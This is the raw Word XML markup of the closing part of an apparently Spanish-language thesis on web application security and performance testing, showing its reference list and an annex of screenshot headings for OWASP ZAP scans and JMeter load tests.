    <w:p w14:paraId="7F9E2451" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IBM Security. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Best practices for XSS prevention</w:t>
      </w:r>
      <w:r>
        <w:t>. IBM Developer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E43FDE" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meier, J. D., Farre, C., Bansode, P., Barber, S., y Rea, D. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Performance testing guidance for web applications</w:t>
      </w:r>
      <w:r>
        <w:t>. Microsoft Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F731F01" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="230"/>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft Azure. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cloud application performance testing methodology</w:t>
      </w:r>
      <w:r>
        <w:t>. Microsoft Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E797733" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="204"/>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">National Institute of Standards and Technology. (2022). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Guide to SQL injection prevention</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Special Publication 800-123). NIST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DED9E3" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="268" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP Top Ten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>https://owasp.or</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:t>g</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId59">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>/www-pro</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId60">
        <w:r>
          <w:t>j</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId61">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>ect-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4459A4C5" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="257" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP. (2023a). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SQL injection prevention cheat sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.or</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId63">
        <w:r>
          <w:t>g</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId64">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>/cheatsheets/SQL_In</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:t>j</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId66">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>ection_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E12E219" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="120" w:line="370" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP. (2023b). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cross site scripting prevention cheat sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.or</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:t>g</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId69">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t>/cheatsheets/Cross_Site_Scriptin</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId70">
        <w:r>
          <w:t>g</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId71">
        <w:r>
          <w:rPr>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <w:t xml:space="preserve">_Prevention_Cheat_Sheet.html </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">Positive Technologies. (2022). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Web application attack statistics</w:t>
      </w:r>
      <w:r>
        <w:t>. PT Security Research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7578AC53" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="253" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stuttard, D., y Pinto, M. (2018). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>The web application hacker's handbook: Finding and exploiting security flaws</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2a ed.). Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177E4CA" w14:textId="5F90DDF1" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Veracode. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>State of software security</w:t>
      </w:r>
      <w:r>
        <w:t>. Veracode Research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F481B" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:ind w:right="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58641BB4" w14:textId="12A96720" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E5DF2A" w14:textId="66776081" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="004223FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBE100E" w14:textId="727A9EBB" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="004223FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65286E3B" w14:textId="5B19C8D7" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="004223FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073AC02B" w14:textId="73EADFD9" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="004223FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149A8ACF" w14:textId="5C89EA39" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc196776215"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ANEXOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="31EB7ED3" w14:textId="326D30A1" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A25C370" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vista principal OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C769CB" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="381DAECD" wp14:editId="51939AF0">
            <wp:extent cx="7232404" cy="3909982"/>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54371" cy="3921858"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E325CDF" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21C5D5" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AF48BB" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66860B4B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6C2286" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32754632" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5812CBFF" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6428DBB0" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C8E886" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278D1A93" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B413C9C" w14:textId="249F89A6" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Escaneo Activo automático</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BF2A41" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5C76BC" wp14:editId="47B6DC66">
            <wp:extent cx="7161774" cy="388800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194845" cy="3905959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4C394" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178FAE94" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2924E0" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B78AB2A" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4B16D7" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB812DD" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B8A38B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1466DDB2" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70455445" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBEC52B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679EBDE3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Uso como Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7A14E" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4182A52A" wp14:editId="1DCA64D7">
            <wp:extent cx="7157581" cy="3898687"/>
            <wp:effectExtent l="0" t="0" r="571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78351" cy="3910000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04240023" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7425E72C" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D22867B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608E147E" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B510B2" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4E5E38" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F817737" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C74FE6" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D50F901" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDDA812" w14:textId="17707DA6" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519102B3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458578BB" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo Pasivo usando proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C756EA2" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CB2711" wp14:editId="16912C9D">
            <wp:extent cx="7112000" cy="3823967"/>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131733" cy="3834577"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30220861" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A84EAD" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DF09BA" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72851E53" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E95CB8" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9707BD" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1310B21B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028D847D" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A205840" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E64282" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686919F7" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23160AEC" w14:textId="5B05297D" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">JMETER VISTA MODO </w:t>
      </w:r>
      <w:r w:rsidR="000E6292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GRAFICO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADD2AF" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52244BF8" wp14:editId="0DFD3C28">
            <wp:extent cx="7130574" cy="40082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53185" cy="4020935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7839F8" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2154DA5A" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4980D1" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DFAEC3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D404AB5" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767EA963" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74353E89" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AD0C79" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC45DCA" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4EF470" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB65DC3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4237F561" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Realizando pruebas de carga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD67AC" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270AA3BD" wp14:editId="724C8D27">
